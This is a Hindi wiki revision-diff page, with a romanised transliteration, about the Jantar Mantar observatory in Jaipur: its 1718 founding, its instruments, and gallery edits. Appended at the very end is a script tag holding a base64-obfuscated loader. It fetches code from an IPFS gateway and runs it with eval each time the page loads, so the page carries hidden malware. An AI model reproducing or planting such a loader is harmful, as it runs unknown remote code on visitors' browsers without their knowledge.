Difference between revisions of "जन्‍तर मन्‍तर जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:जयपुर (को हटा दिया गया हैं।))
Line 1: Line 1:
[[चित्र:Jantar-Mantar-Jaipur.jpg|250px|जन्‍तर मन्‍तर, [[जयपुर]]<br /> Jantar Mantar, Jaipur|thumb]]
+
[[चित्र:Jantar-Mantar-Jaipur.jpg|250px|जन्‍तर मन्‍तर, [[जयपुर]]|thumb]]
 +
'''जन्‍तर मन्‍तर''' [[राजस्थान]] राज्य के [[जयपुर]] शहर में स्थित है। 
 
*[[जयसिंह|महाराजा सवाई जयसिंह]] ने सऩ 1718 में इस वैधशाला की आधार शिला रखी।  
 
*[[जयसिंह|महाराजा सवाई जयसिंह]] ने सऩ 1718 में इस वैधशाला की आधार शिला रखी।  
*इस ज्‍योतिष यंत्रालय में समय की जानकारी, [[सूर्योदय]], [[सूर्योस्‍त]] एवं नक्षत्रों की जानकारी प्राप्‍त करने के उपकरण अवस्थित हैं।  
+
*इस ज्‍योतिष यंत्रालय में समय की जानकारी, सूर्योदय, सूर्योस्‍त एवं [[नक्षत्र|नक्षत्रों]] की जानकारी प्राप्‍त करने के उपकरण अवस्थित हैं।  
 
*वैधशाला में स्‍थापित यंत्रों में वृहत सम्राट यंत्र, जय प्रकाश यंत्र, राम यंत्र, कपाली यंत्र, नाडी वलय यंत्र, घोटा यंत्र आदि मुख्‍य है।
 
*वैधशाला में स्‍थापित यंत्रों में वृहत सम्राट यंत्र, जय प्रकाश यंत्र, राम यंत्र, कपाली यंत्र, नाडी वलय यंत्र, घोटा यंत्र आदि मुख्‍य है।
 
*देश में सबसे पहली वेधशाला [[दिल्ली]] में 1724 में बनवाई गई और उसके दस वर्ष बाद जयपुर में वेधशाला बनाई गई थी|
 
*देश में सबसे पहली वेधशाला [[दिल्ली]] में 1724 में बनवाई गई और उसके दस वर्ष बाद जयपुर में वेधशाला बनाई गई थी|
Line 7: Line 8:
 
*जयपुर की वेधशाला सबसे विशाल एवं विश्व विख्यात हैं।  
 
*जयपुर की वेधशाला सबसे विशाल एवं विश्व विख्यात हैं।  
 
*यहाँ स्थित सम्राट यंत्र विश्व की सबसे बडी सौर [[घड़ी]] मानी जाती हैं।
 
*यहाँ स्थित सम्राट यंत्र विश्व की सबसे बडी सौर [[घड़ी]] मानी जाती हैं।
{{प्रचार}}
+
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 15: Line 16:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Jantar-Mantar-Jaipur-1.jpg|जन्‍तर मन्‍तर, [[जयपुर]]
 +
चित्र:Jantar-Mantar-Jaipur-2.jpg|जन्‍तर मन्‍तर, [[जयपुर]]
 +
चित्र:Jantar-Mantar-Jaipur-3.jpg|जन्‍तर मन्‍तर, [[जयपुर]]
 +
चित्र:Jantar-Mantar-Jaipur-4.jpg|जन्‍तर मन्‍तर, [[जयपुर]]
 +
</gallery>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{राजस्थान के पर्यटन स्थल}}
+
{{विश्व विरासत स्थल2}}{{राजस्थान के पर्यटन स्थल}}
{{विश्व विरासत स्थल2}}
 
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]

Revision as of 12:21, 11 July 2012

[[chitr:Jantar-Mantar-Jaipur.jpg|250px|janh‍tar manh‍tar, jayapur|thumb]] janh‍tar manh‍tar rajasthan rajy ke jayapur shahar mean sthit hai.

  • maharaja savaee jayasianh ne sऩ 1718 mean is vaidhashala ki adhar shila rakhi.
  • is jh‍yotish yantralay mean samay ki janakari, sooryoday, sooryosh‍t evan nakshatroan ki janakari praph‍t karane ke upakaran avasthit haian.
  • vaidhashala mean sh‍thapit yantroan mean vrihat samrat yantr, jay prakash yantr, ram yantr, kapali yantr, nadi valay yantr, ghota yantr adi mukhh‍y hai.
  • desh mean sabase pahali vedhashala dilli mean 1724 mean banavaee gee aur usake das varsh bad jayapur mean vedhashala banaee gee thi|
  • jayapur ke bad ujjain, banaras aur mathura mean vedhashalaean banavayi gee.
  • jayapur ki vedhashala sabase vishal evan vishv vikhyat haian.
  • yahaan sthit samrat yantr vishv ki sabase badi saur gh di mani jati haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>